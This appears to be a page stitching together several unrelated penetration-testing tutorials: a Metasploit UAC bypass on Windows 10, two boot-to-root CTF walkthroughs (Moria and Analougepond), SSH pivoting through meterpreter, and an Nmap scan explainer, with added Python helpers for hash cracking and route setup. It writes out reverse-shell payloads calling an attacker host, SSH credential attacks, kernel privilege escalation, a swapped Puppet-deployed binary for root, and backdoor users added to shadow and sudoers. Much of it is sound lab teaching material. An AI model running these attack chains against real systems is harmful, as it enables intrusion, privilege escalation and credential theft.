In this article we are going to bypass User Account Control (UAC) on the targeted system. This is post-exploitation; hence the attacker must exploit the target system first and then escalate by bypassing UAC protection via a COM handler hijack.

Let’s start!!

Attacker: Kali Linux
Target: Windows 10

First exploit the target to receive a meterpreter session on the victim’s system. Once you have meterpreter session 1, type the following commands to check the system authority and privileges:

getuid
getprivs

From the given image you can perceive that the attacker is inside the meterpreter shell of the victim’s system but doesn’t have system/admin authority and privileges. Hence we need to bypass the UAC protection of the targeted system.


To perform this attack you need to add the bypassuac_comhijack exploit to the Metasploit framework manually.


Copy the entire content of “bypassuac_comhijack” from here and paste it into a text document, then save it as bypassuac_comhijack.rb under the following path:

/usr/share/metasploit-framework/modules/exploits/windows/local/

From the given image you can observe that the bypassuac_comhijack.rb exploit has been saved; as the attacker has his meterpreter session, he can now use this exploit to bypass UAC protection.


This module bypasses Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high-integrity processes are loaded, these registry entries are referenced, resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. The registry key modifications are cleaned up after payload invocation.

use exploit/windows/local/bypassuac_comhijack
msf exploit(bypassuac_comhijack) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(bypassuac_comhijack) > set session 2
msf exploit(bypassuac_comhijack) > set lhost 192.168.0.20
msf exploit(bypassuac_comhijack) > exploit

From the given image you can observe that meterpreter session 3 opened; now type the following commands to determine the system authority and privileges:

getsystem
getprivs

Wonderful!! The attacker got system/admin authority and privileges.

Hack the Moria: 1.1 (CTF Challenge)

Today I found a vulnerable lab based on the world of The Lord of the Rings. So get into your Gandalf mode to solve this fun vulnerable lab, Moria 1.2.; we are going to download the VM from here.

The credit for developing this VM goes to Abatchy. It is a Boot2Root lab.
Note: According to the author you don’t need LOTR knowledge to hack this VM, but trust me, you need it.
Let’s Breach!!!
As always, let us start by finding the IP of the VM (here I have it at 192.168.1.125, but you will have to find your own).

netdiscover

Use the nmap command for port enumeration:
nmap -sV 192.168.1.125

As you can see, port 21 for FTP, port 22 for SSH and port 80 for HTTP are open, so let’s explore port 80 through the browser.

After browsing I found this image labelled Gates of Moria. I decided to do a bit of research on the text written below the image. After searching through some wiki pages, I found its translation, “Say Friend and Enter”, where Mellon means Friend.
So Friend or Mellon must be a password. Keeping that in mind, let’s move forward. Here I decided to scan the target’s directories with a dirb scan. Open the terminal in Kali Linux and type the following command:
dirb http://192.168.1.125/
From the scan result I chose the highlighted directory for further enumeration:
http://192.168.1.125/w/


So I opened this directory in the browser and found another directory inside it, i.e. h/.


On opening it I got another directory, and so on, until the path /w/h/i/s/p/e/r is complete. Here we find the last directory, named the_abyss/.
On opening the_abyss I got some text, as shown in the image: Fundin: “That human will never save us!”
I tried to look at the source code but found nothing; then I refreshed the page and found the text above changed into another text, and on refreshing again it changed into “Knock Knock”.
At first it seemed weird, but I refreshed again and it changed again, so the text was changing randomly whenever I refreshed the web page.
So I decided to run a dirb scan, but it gave no result, so I did a dirb scan with extensions as shown:
dirb http://192.168.1.125/w/h/i/s/p/e/r/the_abyss/ -X .txt,.img,.html

This dirb scan looks only for files with the specified extensions, such as .txt or .img.

Aha! Found a file named random.txt.
So I opened it through the browser and found all the text that appeared on refreshing the page together on a single web page, as shown.
This text contains a lot of names, like Balin, Oin, Ori, Fundin, Nain, Eru and Balrog; I noted them because they might be usernames or passwords.
Now I tried to connect with ftp port.

ftp 192.168.1.125

It greeted me with "Welcome Balrog".
I knew it must be the username, because it appeared in random.txt too. For the password I tried several of the names found earlier, then remembered the text from the image, "Say friend and enter". I entered Friend but the login failed; then I tried Mellon and the login succeeded.
Therefore use the following credentials for the FTP login:
Username: Balrog
Password: Mellon
NOTE: if you get an error, restart the VM and retry the above username and password a few times.
After login I ran pwd and got the path /prision. I looked around it hoping for a flag but found no hint. Then I found the var folder and moved inside it.
From there I got to /var/www/html, where I found this folder: QlVraKW4fbIkXau9zkAPNGzviT3UKntl


When I opened it in the browser I found a table with two columns, Prisoner's name and Passkey, as shown in the given image.

As always, I searched the source code for a hint. In the View Source page I found the "salt" that can be used to crack the MD5 passkeys.

After trying different formats for these salted MD5 hashes, I created a file listing each name, passkey and the salt in this format:
Prisoner's Name:Passkey$Salt
Name it whatever you want (here I named it passwords and saved it on my Kali desktop).
Now run John the Ripper on this file with the dynamic_6 format, which is md5(md5($pass).$salt), using this command in the Kali terminal:
john --format=dynamic_6 /root/Desktop/passwords
The cracked values look like login credentials.

After trying each of the cracked credentials against SSH, I got in with:
SSH Login
Username: Ori
Password: spanky
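To make the dynamic_6 construction concrete, here is an added example (not code from the original walkthrough) that reproduces what John does for that format: hash each candidate as md5(md5(password).salt) and compare it with every name:hash$salt line. The sample lines, the salt value and the wordlist are constructed for the example and are not the VM's real table; the walkthrough's real credentials were recovered with John, not with this script.

```python
"""Reproduce John's dynamic_6 check, md5(md5($pass) . $salt), over a hash file."""
import hashlib


def dynamic6(password: str, salt: str) -> str:
    """Hex digest of md5(md5(password) . salt); the inner md5 is lowercase hex, as JtR does."""
    inner_hex = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5((inner_hex + salt).encode()).hexdigest()


def parse_line(line: str):
    """Split 'user:hash$salt' into (user, hash, salt).

    Only the first '$' separates hash and salt, so a salt containing '$' survives intact.
    """
    user, rest = line.strip().split(":", 1)
    digest, salt = rest.split("$", 1)
    return user, digest.lower(), salt


def crack(lines, wordlist):
    """Try every wordlist entry against every line; return {user: password}."""
    targets = [parse_line(line) for line in lines if line.strip()]
    found = {}
    for word in wordlist:
        for user, digest, salt in targets:
            if user not in found and dynamic6(word, salt) == digest:
                found[user] = word
    return found


# Constructed sample (not the VM's real table): one site-wide salt, as on the page,
# with the hashes generated by the same function so the result is checkable.
SITE_SALT = "c0nstructedSalt"
SAMPLE_USERS = {"Balin": "flower", "Ori": "spanky", "Oin": "n0t-in-wordlist"}
SAMPLE_LINES = [f"{u}:{dynamic6(p, SITE_SALT)}${SITE_SALT}" for u, p in SAMPLE_USERS.items()]
SAMPLE_WORDLIST = ["password", "Mellon", "flower", "Balrog", "spanky"]

if __name__ == "__main__":
    for user, password in crack(SAMPLE_LINES, SAMPLE_WORDLIST).items():
        print(f"{user}: {password}")
```

Running it prints the two users whose passwords are in the wordlist; Oin stays uncracked, which is exactly the behaviour to expect from John when a passkey is not in the list.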
Now login into ssh using above credential


Here we got a bash shell. I tried several commands in search of a flag; in ls -la I found a poem.txt file containing a poem, but no flag inside it.
Then I looked into the .ssh/ directory and found a known_hosts file and an id_rsa file containing a private key, and opened them one by one:
cat id_rsa
Copy the entire text found inside id_rsa into a text file on your machine and save it as id_rsa (restrict it with chmod 600, otherwise ssh refuses to use a key that other users can read).
Now open the other file, known_hosts, with cat; here you will find the host "127.0.0.1". Let's use this information to log in over SSH as root:

ssh -i id_rsa root@127.0.0.1
I got ROOT.
But let's finish it properly. So I ran ls -la to look for a flag and found flag.txt; inside it was the final message, "All that is gold does not glitter".
It was an adventurous and learning experience and I would like to thank Abatchy for creating such a fun VM Lab




SSH Pivoting using Meterpreter

If you are familiar with SSH tunneling you can easily understand SSH pivoting; if not, don't worry, read about SSH tunneling from here first.

Pivoting is a technique for reaching an otherwise unreachable network through a pivot (a central point). In simple words, it is an attack through which the attacker can exploit systems that belong to a different network. For this attack the attacker first compromises the main server, which places him inside its local network; the attacker can then target the client systems on that network.


This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109
msf auxiliary(ssh_login) > set username raj
msf auxiliary(ssh_login) > set password 123
msf auxiliary(ssh_login) > exploit


From the given image you can observe that command shell session 1 opened.


Now upgrade the command shell into a meterpreter shell with the following command:
sessions -u 1
From the given image you can observe that meterpreter session 2 opened.

sessions

Hence, if you count, the attacker currently holds 2 sessions: the 1st a command shell and the 2nd a meterpreter shell on the SSH server.


Check the network interfaces with the ifconfig command.
From the given image you can observe two network interfaces on the victim system: the 1st with IP 192.168.0.109, through which the attacker is connected, and the 2nd with IP 192.168.10.1, through which the SSH client (the target) is connected.

Since the attacker sits on the 192.168.0.0/24 network and the client on 192.168.10.0/24, it is not possible to attack the client network directly unless the attacker gets a route into it. To reach the 192.168.10.0 network the attacker runs the post-exploitation module "autoroute".

This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 
msf post(autoroute) > set subnet 192.168.10.0
msf post(autoroute) > set session 2
msf post(autoroute) > exploit


This time we are exploiting SSH user ignite (on the local client), so we use the same module as above for SSH user raj, only changing the target details inside the module options.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.10.2
msf auxiliary(ssh_login) > set username ignite
msf auxiliary(ssh_login) > set password 1234
msf auxiliary(ssh_login) > exploit

From the given image you can see that another command shell, session 3, opened; counting them, the attacker now holds 3 sessions: two on the SSH server and one on the SSH client.

sessions

1.       Command shell for SSH raj (192.168.0.109:22)
2.       Meterpreter shell for SSH raj (192.168.0.109)
3.       Command shell for SSH ignite (192.168.10.2:22)


sessions -i 3
Now the attacker is in the command shell of SSH client ignite; let's verify through the network configuration.
ifconfig
From the given image you can observe that the network IP is 192.168.10.2.

Pivoting is a dangerous but enjoyable network attack.


Hack the Analougepond VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge, known as Analougepond, which builds on our previous article "SSH pivoting"; if you are familiar with SSH pivoting you can easily breach this VM.

The credit for making this VM goes to "Knightmare". It is another boot-to-root machine where the author has hidden flags for the attacker as the challenge.

Lets Breach!!!

The target holds 192.168.0.108 as its IP; now let's find the open ports using nmap (a TCP scan plus a UDP scan, since SNMP runs over UDP).
nmap -sT -sU 192.168.0.108


From the given image you can see that port 22 (SSH), UDP port 68 (DHCP client) and UDP port 161 (SNMP) are open on the target.


Now let's enumerate SNMP using Metasploit.
This module allows enumeration of any device with SNMP support. It returns hardware, software and network information. The default community string is "public".

use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > set rhosts 192.168.0.108
msf auxiliary(snmp_enum) > set threads 5
msf auxiliary(snmp_enum) > exploit

From the given image you can read system information such as the host IP, hostname, description and so on. Notice the highlighted contact, which contains a name, Eric Burdon, and the location, which contains the text "there is a house in New Orleans they call it………".
Here eric could be a hint for the username; now let's ask Google about "there is a house in New Orleans they call it………".


When I searched for the text on Google, I found that it is a lyric from the song "The House of the Rising Sun", which Eric Burdon sang with The Animals, so the contact and location hints belong together. It is likely that the author, knightmare, wants to give a password clue through this song. From the given image you can read the highlighted text "the Rising Sun", which could be the SSH password.


Now let's try the SSH login using Metasploit.

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.108
msf auxiliary(ssh_login) > set username eric
msf auxiliary(ssh_login) > set password therisingsun
msf auxiliary(ssh_login) > exploit

As a result we logged in successfully and obtained command shell session 1 on the target; we also found the installed Ubuntu version, 14.04.1.
A Google search shows that Ubuntu 14.04.1 is vulnerable to the overlayfs privilege escalation.


This module attempts to exploit two different CVEs related to overlayfs. CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 3.16.0-25 (14.10 default) < 3.16.0-41 3.19.0-18 (15.04 default) < 3.19.0-21 CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) Fedora: < 4.2.8 (vulnerable, un-tested) Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested)
use exploit/linux/local/overlayfs_priv_esc
msf exploit(overlayfs_priv_esc) > set  lhost 192.168.1.105
msf exploit(overlayfs_priv_esc) > set session 1
msf exploit(overlayfs_priv_esc) > exploit -j

This time we also successfully got command shell session 2 on the target.


Now upgrade the command shell (session 2) into a meterpreter shell using the following command:
sessions -u 2
This opens a new session, session 3, as a meterpreter shell.

meterpreter > ls
meterpreter > cat flag.txt
We have captured the 1st flag successfully!!


When I checked the network interface configuration on the target system, I found a new IP, 192.168.122.1, on its 3rd interface, as shown in the given image.
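Both here and in the SSH pivoting article above, the decision of which subnet to hand to autoroute is made by eyeballing ifconfig output. As an added example (not code from either original walkthrough), the script below parses an ifconfig dump, drops the loopback and the network the attacker is already on, and emits the msfconsole lines for post/multi/manage/autoroute (its SUBNET, NETMASK and SESSION options). The ifconfig text is constructed to resemble the pivot hosts in the two articles, with one interface in the newer net-tools layout so both formats are exercised; the attacker address and session number are assumptions.

```python
"""Pull pivot-worthy subnets out of a compromised host's ifconfig output."""
import ipaddress
import re

# Old net-tools layout ("inet addr:A ... Mask:M", Ubuntu 14.04) and the newer one ("inet A netmask M").
_OLD_STYLE = re.compile(r"inet addr:(\S+).*?Mask:(\S+)")
_NEW_STYLE = re.compile(r"\binet (\S+)\s+netmask (\S+)")


def interface_networks(ifconfig_text: str):
    """Return [(address, network)] for every IPv4 address found in the dump."""
    found = []
    for line in ifconfig_text.splitlines():
        m = _OLD_STYLE.search(line) or _NEW_STYLE.search(line)
        if m:
            addr, mask = m.group(1), m.group(2)
            found.append((addr, ipaddress.ip_network(f"{addr}/{mask}", strict=False)))
    return found


def pivot_candidates(ifconfig_text: str, attacker_ip: str):
    """Networks the host sits on that the attacker is not already part of (loopback excluded)."""
    attacker = ipaddress.ip_address(attacker_ip)
    out = []
    for _, net in interface_networks(ifconfig_text):
        if net.is_loopback or attacker in net or net in out:
            continue
        out.append(net)
    return out


def autoroute_script(ifconfig_text: str, attacker_ip: str, session: int):
    """msfconsole resource-script lines adding one autoroute entry per candidate subnet."""
    lines = []
    for net in pivot_candidates(ifconfig_text, attacker_ip):
        lines += [
            "use post/multi/manage/autoroute",
            f"set SUBNET {net.network_address}",
            f"set NETMASK {net.netmask}",
            f"set SESSION {session}",
            "run",
        ]
    return lines


# Constructed ifconfig output modelled on the pivot hosts in these two articles
# (not a real capture): eth0 faces the attacker, eth1 and virbr0 face internal networks.
SAMPLE_IFCONFIG = """\
eth0      Link encap:Ethernet  HWaddr 00:0c:29:aa:bb:cc
          inet addr:192.168.0.109  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feaa:bbcc/64 Scope:Link
eth1      Link encap:Ethernet  HWaddr 00:0c:29:aa:bb:dd
          inet addr:192.168.10.1  Bcast:192.168.10.255  Mask:255.255.255.0
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
virbr0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.122.1  netmask 255.255.255.0  broadcast 192.168.122.255
"""

if __name__ == "__main__":
    # Attacker address and meterpreter session number are assumptions for the demo.
    print("\n".join(autoroute_script(SAMPLE_IFCONFIG, "192.168.0.104", session=2)))
```

Paste the printed lines into msfconsole (or save them as a .rc file and load it with resource) after the meterpreter session is up; the script deliberately passes the network address rather than the interface address as SUBNET.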


This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 
msf post(autoroute) > set subnet 192.168.122.0
msf post(autoroute) > set session 3
msf post(autoroute) > exploit


meterpreter > arp
Here you can see all the IP and MAC addresses; 192.168.122.2 will be our next target.


Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 192.168.122.2
msf auxiliary(tcp) > set ports 1-500
msf auxiliary(tcp) > set threads 10
msf auxiliary(tcp) > exploit

From the result we found that port 22 (SSH) is open.


Go back into the meterpreter shell, then type the following command to forward local port 8000 to port 22 on the pivot target, as shown below:
sessions -i 3
portfwd add -l 8000 -p 22 -r 192.168.122.2


Now log in to the SSH server through localhost on the forwarded port:
ssh localhost -p 8000
From the given image you can read the banner message; again it is a hint for the username, "sandieshaw". Now let's ask Google for her famous song to get a hint for the password.


After searching Google we guessed that the password should be Sandie Shaw's famous song, "puppetonastring".
With this password we connect as sandieshaw through SSH.


After connecting as sandieshaw through SSH, we found that we have to root this system.

After looking through the files on this system we found that Puppet is running on it.
Among those files we find a Puppet manifest that ensures a file named spin is present in /tmp/ of the system, copied there from the module's files directory by Puppet, which runs as root.


Then in the module's files directory we found two files, one in C and one an executable. Opening the C file, we found it is the code for a spinning pipe animation. Now we replace the executable with our own file that gives us root access to the system.


Puppet will place this file as root, so when it runs we get a root shell on the server.
We then go back to the meterpreter shell and upload our file into the home directory of the current user, eric.


After uploading it we compile it and send it to sandieshaw using scp:
scp spin sandieshaw@192.168.122.2:/home/sandieshaw


Now we replace the spin file in /etc/puppet/modules/wiggle/files/ with our spin file.


The spin file is replaced; now we have to wait for the Puppet run to replace the spin file in /tmp/ with ours.
After waiting some time, we execute the spin file present in /tmp/.


Now we have a root shell. Moving into /root/protovision we found a flag in hexadecimal.
After converting it from hex, we found a reversed base64 string.


After reversing the string and decoding it we found that it was a link to a YouTube video.


Then we moved on to the other files; jim and melvin didn't have anything significant, so we moved to the folder .I_have_you_now. There we found a folder .a; to check how many folders were nested inside, we listed all the directories with the command:
find . -type d


We found that it goes all the way to .z; we move to this location to see its contents.


We found two files, one GPG-encrypted and another readable. We decrypt the encrypted one with the command:
gpg nleeson_key.gpg
This asks for a passphrase; the password is secret, which was hinted at in the video.
Opening the file we found that it was a private key, so we restricted its permissions (ssh refuses a key that other users can read) using:
chmod 600 nleeson_key
Then we looked at the contents of the other file; it displayed a single word, joshua.

During our network scan we had found another IP, 192.168.122.3, with SSH open, but we couldn't connect to it.
Now we try to connect to it using the private key we found.
After guessing a few users we found that nleeson was the user for the system.
Using the key asks for a passphrase; the password is joshua.


We connected to 192.168.122.3. After looking around we couldn't find anything, so we went back to root on 192.168.122.2. Looking through the files there we found that 192.168.122.2 was the Puppet master and 192.168.122.3 the Puppet agent. We found a file called barringsbank-passwd that held all the usernames and password hashes for 192.168.122.3.


So we added a new user, ignite, to this file by opening it in vim.
Linux shadow entries use salted md5-crypt hashes of the form $1$salt$hash, so we generate one for the password ignite using xyz as the salt.


Then we add our user to sudoers to gain root access.


Then we give our new user the same permissions as root.


Then we connect to 192.168.122.3 through SSH using the username and password we just created.


Now we have to wait some time for the Puppet agent to pull the updated sudoers from the master, so that our user gets root access.
Then we get a root shell using sudo su.
We move into the root folder and find an image file, me.jpeg.


We then copy the image file to eric's host using scp:
scp me.jpeg eric@192.168.1.119:/home/eric/


Then we download the file from eric's host to our local system through Metasploit: in the meterpreter shell, download me.jpeg.
meterpreter > cd eric/
meterpreter > download me.jpeg /root/Desktop/


We ran exiftool on this file and found nothing, so we checked for steganography using steghide.
First we check whether any file is hidden inside this image with the command:
steghide --info me.jpeg
The passphrase is reticulatingsplines; I found it after various attempts.
steghide reports a hidden text file.


We extract the text file with steghide using the following command:
steghide extract -sf me.jpeg
It again asks for the passphrase, reticulatingsplines.
After extracting the file we found that its contents are hex encoded.


After converting the file from hex we found that the text was base64 encoded again.



The text contains a recurring phrase, gACI, which prevents it from decoding as base64.
After removing it we found that the text was reversed; after reversing and decoding it we got the final flag.



Understanding Nmap Scan with Wireshark

In this article you will learn how to capture network packets with Wireshark while an attacker scans a target using Nmap's port-scanning methods. You will notice how Wireshark captures different traffic for open and closed ports.

Lets start!!!
TCP SCAN

A TCP connect scan checks TCP ports such as 22, 21, 23, 445 etc. and confirms a listening (open) port by completing the 3-way handshake between source and destination. If the port is open, the source sends a SYN packet, the destination responds with SYN, ACK, the source sends ACK, and finally the source tears the connection down with RST, ACK.

Type the following Nmap command for a TCP connect scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sT -p 445 192.168.1.102
From given image you can observe the result that port 445 is open.
Look over the sequence of packet transfer between source and destination captured through wireshark.
You will notice that it has captured same sequence of flag as described above:
  • Source sent SYN packet to destination
  • Destination sent SYN, ACK to source
  • Source sent ACK packet to destination
  • Source again sent RST, ACK to destination.

Let's figure out the network traffic for a closed port. According to the given image, if the scanned port is closed the 3-way handshake cannot complete between source and destination.
The source sends a SYN packet and, because the port is closed, the receiver responds with RST, ACK.
Type the following Nmap command for a TCP connect scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sT -p  3389 192.168.1.102
From given image you can observe the result that port 3389 is closed.


Look over the sequence of packet transfer between source and destination captured through wireshark.
You will notice that it has captured same sequence of flag as described above:
  • Source sent SYN packet to destination
  • Destination sent RST, ACK packet to source
 

Stealth Scan
SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy, since it never completes TCP connections.
The port is also considered open if a SYN packet (without the ACK flag) is received in response.
This technique is often referred to as half-open scanning, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection, and then wait for a response. A SYN, ACK indicates the port is listening (open); an RST (or RST, ACK) indicates it is closed; no response after retransmissions marks it filtered.

Type the following Nmap command for a SYN scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sS -p 22 192.168.1.102
From given image you can observe the result that port 22 is open.

Look over the sequence of packet transfer between source and destination captured through wireshark
  • Source sent SYN packets to destination
  • Destination sent SYN, ACK packets to source
  • Source sent RST packets to destination
 
Now let's look at the traffic for a closed port using a stealth scan. When the source sends a SYN packet to a specific port and the port is closed, the destination replies with an RST, ACK packet.


Type the following Nmap command for a SYN scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sS -p 3389 192.168.1.102
From the given image you can observe the result that port 3389 is closed.
Look over the sequence of packet transfer between source and destination captured through wireshark
  • Source sent SYN packets to destination
  • Destination sent RST, ACK packets to source
 

Fin Scan
A FIN packet is normally used to terminate a TCP connection after the data transfer is complete. Instead of a SYN packet, Nmap starts a FIN scan with a bare FIN packet. If the port is open, no response comes back from the destination, while a closed port answers with RST. Two caveats: silence is also what you get when a firewall drops the probe, so Nmap reports such ports as open|filtered rather than open, and systems that do not follow RFC 793 (Windows and many Cisco devices among them) send RST for every port regardless of state, so FIN, Null and Xmas scans cannot be used against them.

Type the following Nmap command for a FIN scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sF -p 22 192.168.1.102
From the given image you can observe the result that port 22 is reported open|filtered, which for this lab host means open.
 

Look over the sequence of packet transfer between source and destination captured through wireshark
  • Source sent FIN packets to destination
  • Destination sent no reply to source 
 

Similarly, if a FIN scan is run against a closed port, the source sends a FIN packet to that port and the destination replies with RST, ACK.
Type the following Nmap command for a FIN scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sF -p 3389 192.168.1.102
From the given image you can observe the result that port 3389 is closed.

Look over the sequence of packet transfer between source and destination captured through wireshark
  • Source sent FIN packets to destination
  • Destination sent RST, ACK packets to source
 



Null Scan
A Null scan sends TCP packets with no flag bits set (the flags field is all zeros). Because no flags are set, an RFC-compliant destination does not know how to handle the request on an open port: it discards the packet and sends no reply, which Nmap reports as open|filtered for the same reason as with the FIN scan.

Type the following Nmap command for a Null scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sN -p 22 192.168.1.102
From the given image you can observe the result that port 22 is reported open|filtered.
 Look over the sequence of packet transfer between source and destination captured through wireshark
  • Source sent Null packets to destination
  • Destination sent no reply to source 
 

If the port is closed, the destination sends an RST, ACK packet in response when the source sends a Null packet to that port.

Type the following Nmap command for a Null scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sN -p 3389 192.168.1.102
From the given image you can observe the result that port 3389 is closed.
Look over the sequence of packet transfer between source and destination captured through wireshark
  • Source sent Null (none) packets to destination
  • Destination sent RST, ACK to source 
UDP Scan
A UDP scan works by sending a UDP packet to every targeted port; UDP is a connectionless protocol, so there is no handshake to observe. For some common ports, such as 53 and 161, a protocol-specific payload is sent to increase the response rate; a service that replies with a UDP packet proves the port is open. If no response is received after retransmissions, the port is classified as open|filtered, which means it could be open or a packet filter may be dropping the probe. An ICMP port unreachable error means the port is closed.

Type the following Nmap command for a UDP scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sU -p 161 192.168.1.119
From the given image you can observe the result that port 161 is open.
 Look over the sequence of packet transfer between source and destination captured through Wireshark
  • Source sent UDP packets to destination
  • Destination sent UDP packet with some data to the source   
 

Similarly, if the source sends a UDP packet to a closed port, the destination replies with an ICMP destination unreachable packet carrying the port unreachable code (type 3, code 3).

Type the following Nmap command for a UDP scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sU -p 53 192.168.1.119
From the given image you can observe the result that port 53 is closed.
 
Look over the sequence of packet transfer between source and destination captured through wireshark
  • Source sent UDP packets to destination
  • Destination sent ICMP packet port unreachable to the source  
 
Xmas Scan
An Xmas scan sets the FIN, PSH and URG flags of the TCP header, lighting the packet up like a Christmas tree. When the source sends a FIN, PSH, URG packet to a specific port and the port is open, the destination discards the packet and sends no reply, which Nmap reports as open|filtered.

Type the following Nmap command for an Xmas scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sX -p 22 192.168.1.102
From the given image you can observe the result that port 22 is reported open|filtered.

Look over the sequence of packet transfer between source and destination captured through wireshark
  • Source sent FIN,PUSH and URG packets to destination
  • Destination sent no reply to source 
 
Similarly, if the source sends FIN, PSH, URG packets to a closed port, the destination replies with RST, ACK.

Type the following Nmap command for an Xmas scan and, on the other hand, start Wireshark to capture the packets sent.
nmap -sX -p 3389 192.168.1.102
From the given image you can observe the result that port 3389 is closed.
Look over the sequence of packet transfer between source and destination captured through wireshark
  • Source sent FIN,PUSH and URG packets to destination
  • Destination sent RST, ACK packet to source
 
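The flag sequences listed above are exactly what a detection rule keys on, so as an added example (not code from the original article) here is a small classifier that reads a one-line-per-packet summary in the style of a Wireshark export, groups packets into probe flows, names the Nmap scan type from the first probe's flags and infers the port state from the reply, including the open|filtered verdict for silent FIN, Null and Xmas probes and the distinction between -sT and -sS on an open port (a completed handshake versus an RST teardown). The packet lines are constructed to mirror the seven captures in this article; the addresses, source ports and line format are assumptions, not a real capture.

```python
"""Infer Nmap scan type and port state from a TCP packet summary, using the rules above."""

PROBE_KINDS = {
    frozenset({"SYN"}): "SYN",
    frozenset({"FIN"}): "FIN (-sF)",
    frozenset(): "Null (-sN)",
    frozenset({"FIN", "PSH", "URG"}): "Xmas (-sX)",
}


def parse_packet(line: str):
    """'src:sport > dst:dport [FLAG,FLAG]' -> (src, sport, dst, dport, frozenset of flags)."""
    left, right = line.split(">", 1)
    src, sport = left.strip().rsplit(":", 1)
    endpoint, flags = right.strip().split("[", 1)
    dst, dport = endpoint.strip().rsplit(":", 1)
    flagset = frozenset(f.strip() for f in flags.rstrip("]").split(",") if f.strip())
    return src, int(sport), dst, int(dport), flagset


def classify(lines):
    """Group packets into probe flows (first packet defines scanner -> target) and judge each.

    Returns [(target, port, scan_kind, state)] in first-seen order.
    """
    flows = {}
    for line in lines:
        src, sport, dst, dport, flags = parse_packet(line)
        fwd, rev = (src, sport, dst, dport), (dst, dport, src, sport)
        if rev in flows:
            flows[rev].append(("reply", flags))
        else:
            flows.setdefault(fwd, []).append(("probe", flags))
    results = []
    for (_scanner, _sport, target, dport), pkts in flows.items():
        kind = PROBE_KINDS.get(pkts[0][1], "unknown")
        replies = [f for who, f in pkts if who == "reply"]
        later = [f for who, f in pkts[1:] if who == "probe"]
        if kind == "SYN":
            if any({"SYN", "ACK"} <= f for f in replies):
                state = "open"
                # -sT completes the handshake with a bare ACK; -sS tears down with RST
                kind = "TCP connect (-sT)" if frozenset({"ACK"}) in later else "SYN (-sS)"
            elif any("RST" in f for f in replies):
                state, kind = "closed", "SYN (-sS or -sT)"   # identical on a closed port
            else:
                state, kind = "filtered", "SYN (-sS or -sT)"
        elif kind == "unknown":
            state = "unknown"
        elif any("RST" in f for f in replies):
            state = "closed"
        else:
            state = "open|filtered"   # silence: open, or a firewall dropped the probe
        results.append((target, dport, kind, state))
    return results


# Constructed packet summary mirroring the seven captures in the article (not a real export).
SAMPLE_PACKETS = [
    "192.168.1.120:40001 > 192.168.1.102:445 [SYN]",        # -sT, open: full handshake
    "192.168.1.102:445 > 192.168.1.120:40001 [SYN,ACK]",
    "192.168.1.120:40001 > 192.168.1.102:445 [ACK]",
    "192.168.1.120:40001 > 192.168.1.102:445 [RST,ACK]",
    "192.168.1.120:40002 > 192.168.1.102:3389 [SYN]",       # -sT, closed
    "192.168.1.102:3389 > 192.168.1.120:40002 [RST,ACK]",
    "192.168.1.120:40003 > 192.168.1.102:22 [SYN]",         # -sS, open: half-open, RST teardown
    "192.168.1.102:22 > 192.168.1.120:40003 [SYN,ACK]",
    "192.168.1.120:40003 > 192.168.1.102:22 [RST]",
    "192.168.1.120:40004 > 192.168.1.102:22 [FIN]",         # -sF, open: no reply
    "192.168.1.120:40005 > 192.168.1.102:3389 [FIN]",       # -sF, closed
    "192.168.1.102:3389 > 192.168.1.120:40005 [RST,ACK]",
    "192.168.1.120:40006 > 192.168.1.102:22 []",            # -sN, open: no reply
    "192.168.1.120:40007 > 192.168.1.102:3389 [FIN,PSH,URG]",  # -sX, closed
    "192.168.1.102:3389 > 192.168.1.120:40007 [RST,ACK]",
]

if __name__ == "__main__":
    for target, port, kind, state in classify(SAMPLE_PACKETS):
        print(f"{target}:{port:<5} {kind:<18} {state}")
```

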